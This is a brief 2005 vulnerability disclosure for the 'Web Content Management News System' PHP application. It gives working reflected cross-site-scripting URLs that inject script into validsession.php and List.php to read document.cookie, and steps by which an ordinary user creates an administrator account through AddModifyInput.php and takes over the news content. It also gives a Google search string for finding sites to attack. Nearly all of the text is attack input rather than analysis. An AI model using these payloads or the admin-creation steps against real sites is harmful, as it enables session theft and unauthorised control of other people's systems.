10.53 29/07/2005
Web Content Management News System Administrative Account creation & cross site scripting poc

author site: http://www.web-content-management.us/content-management-download.php

xss:
http://[target]/[path]/Includes/validsession.php?strRootpath=');}//%20--></script><script>alert(document.cookie)</script>
http://[target]/[path]/Admin/News/List.php?strTable=<script>alert(document.cookie)</script><!--

a simple user can inexplicably create an admin account at this url:
http://[target]/[path]/Admin/Users/AddModifyInput.php

then new admin can go to this page:
http://[target]/[path]/Logon.php

login, after he can add, modify, delete news 

googledork:
"powered by web-content-management"


rgod
email: retrogod at aliceposta.it
site: http://rgod.altervista.org